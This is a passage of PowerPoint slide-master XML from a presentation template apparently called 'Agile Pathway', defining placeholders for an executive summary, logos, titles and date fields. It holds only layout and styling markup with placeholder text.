            <a:ext cx="3214687" cy="642937"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="212745"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="381000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2800" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="4100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="4100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="4100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="4100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9E6FB"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agile Pathway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{3BE19AD9-EA4B-48F2-9FDC-2EC333E07E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1F4F6B-26A6-4BB1-9C00-BE687584A171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>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30D78FBD-E7FF-4B80-8655-3023B95E79E0}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{A04DAEBD-5717-4AF8-A12C-E5FFE57F4F1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ECAC8E-042A-43AF-95E0-0C39C2B908A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="7"/>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D74048E2-CA69-433C-A4CA-E4B3BAF4931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xe">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FEDE696C-D194-4403-9591-036A4B66BF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B7D57B-CD08-43B0-9295-0DE045E24EE2}"/>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BDE57D0D-6BA7-4A80-8F49-7624066B3B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5FE3D1-B2C2-4BC6-A2EB-1331C95E447A}"/>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B6AE1D8C-BE90-47BC-A5AC-24CECBE6E2AD}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF8EC0EF-E656-402B-A4A7-D161726A21F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FEA2EF4-B53C-4CF4-88B3-B5A81EA19302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{A0236B27-DDC8-425E-B11E-82E402621F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E1555B-C47E-498E-92C2-4CD3725A8D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1200150"/>
            <a:ext cx="5909452" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{B96E283F-4BA9-4C6F-9222-C038A3ECA4B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CCC920-BCD2-473C-8A72-E584CE68BA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{4109B189-B587-4A16-B663-EB231FC84E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F6CE44-07B7-40EC-9719-5FA2CE9ABDB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="5909452" cy="2667390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400"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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief summary / description of the project – Remember, Strong slides are a support for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your entire presentation, not a substitute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your presentation is a live experience carried by the presenter so it’s important to visually represent your points without asking your audience to divide their attention too much.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{2C2D9542-C077-49DD-9082-CAE759C42A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50E8CB-11F0-49AC-AE4C-7527D2D11631}"/>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795D963B-424B-4BF8-A9B6-D00E8509A6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0373201-EED4-4615-8BA8-D06A5ED7974C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>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defRPr lang="en-US" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{4ECA3C1B-781A-459F-BC71-CD32897DE28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87D307F-19A7-450D-921A-B8D2BEE437E3}"/>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0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{1DEC65DA-92FB-4EC9-838E-0ED0E922E0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9062F4C-05BE-46CF-AF4A-1119632BD274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="6"/>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C4C3B011-6A8C-4227-BF05-EDBF49B5A5D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Rectangle 6">
            <a:extLst>
              <a:ext uri="{804451B3-B362-4163-8993-5EF8960683A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ABD5539-61D6-4904-B3D2-CEAFB07002FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3619500"/>
            <a:ext cx="63500" cy="1143000"/>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16">
            <a:extLst>
              <a:ext uri="{2F03B034-9D16-477E-9BF3-711DDB00A44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154B3F2-89BE-46C2-9EBA-941083274664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="3057525"/>
            <a:ext cx="3317548" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Dosis Light"/>
              </a:rPr>
              <a:t>Choose a Memorable Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{F96CE554-010B-4AF3-BCED-E2DFEBAA02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59035B-76F6-4E35-A3A8-5C47BC770C65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061966" y="1343025"/>
            <a:ext cx="1893103" cy="2458221"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{68F4E07E-13C6-432A-B2E2-F903234312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9CAEF9-11D9-43F0-8D20-0D6DF72152B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="4401264"/>
            <a:ext cx="1524000" cy="301946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{D9EF07A6-CA54-4476-9CDE-D0CBF421BE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03A24BC-B1E1-4CF2-9429-9776CDE5E938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="2066925"/>
            <a:ext cx="3314700" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="3200" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{3523AB7F-CF5E-48FB-9454-3AF5FE2F57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362DD2-1697-4C0F-947C-5AD343994E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8742DD4A-B89D-4CE4-8ABE-02C7F4F89AF6}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{B77EAF2F-2603-4ED5-8001-2E4F19F5D58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9DBE53-74A0-4E35-89DB-7ECF000AF494}"/>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A1A931C3-DF42-4841-AEE0-A82389064C28}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{4FB52ED4-4C3A-4CB5-B949-CBB4647789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D10AD4E-FEE2-481F-8472-498D1DB32B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="6"/>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extLst>
      <p:ext uri="{B9BB5FA2-5E9D-4C1F-9D7A-5056B85DD6E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e">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{009D4B72-A6C2-4796-8F0E-369BADDF85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A37F1F-DE02-4E57-B9A7-3EE44CEFFC56}"/>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29681902-A8AA-49CE-93F1-4BACA312AE2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3DEC8BF-1913-454F-9BFB-6FE20856BAF1}"/>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29887BD5-7202-4821-A8AA-F194842D299E}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{1B5723E3-A56E-4410-953A-EC7BB88769B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45B9D0A-2A2F-4A6B-A818-FEC083980A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4743450"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{375F21DE-1FA8-40F6-A063-B0929F7A5EB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FA5D42-E5B7-4CE8-96C7-229D497426D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1200150"/>
            <a:ext cx="5907672" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{D9B4C5E5-1A91-488C-B1F7-93759D9943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6812510-B443-4116-B28D-F42757C47E6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{3016EE4F-FA68-4093-915B-21BCB9EC32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723DC2A-1A2F-4F34-B131-EA5F58AF195D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="5907672" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400"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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief summary / description of the project – Remember, Strong slides are a support for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your entire presentation, not a substitute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your presentation is a live experience carried by the presenter so it’s important to visually represent your points without asking your audience to divide their attention too much.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{CC72B77F-7CAD-4B25-8621-CE8DBAC694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A6315A-50A0-4017-AFCB-1D89A8B52D83}"/>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51EFBCE7-F6FB-452A-BD69-EB2F4E5D2B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5DE04B8-C387-4A10-BA0A-710060474A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>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10" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{657D3AE7-246C-4EF6-A68A-42E5A52119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8FC302-01BD-4A49-BFE6-53F4C7A5407A}"/>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4D0DBD97-A482-4ADF-83F0-6E32FCAE33A5}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{21988F1D-8800-4A3C-8B38-8A7751F685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DD69794-CF17-4044-A1D5-6C140E954B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="6"/>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9B67EEBE-15D2-4E2D-88EE-BD0294B733C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xecutive Summary">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{02129B23-745C-4B69-A65B-BBAD71626B1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BAA5DE-B274-4AD4-A61F-162043218CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9088120" y="465137"/>
            <a:ext cx="63500" cy="1135062"/>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5">
            <a:extLst>
              <a:ext uri="{765634BB-6F88-429A-809B-A4F747374D7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F0E4845-75E9-4333-8280-38D818A03E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3478B6"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D03BFBC2-06E3-4B26-A0F1-3CFD67EF8A3E}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{B7D47AD6-EC72-48AE-8BCD-26B4FD11ABD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65E25F8-F5DD-4E8A-A002-C5444C2A925B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
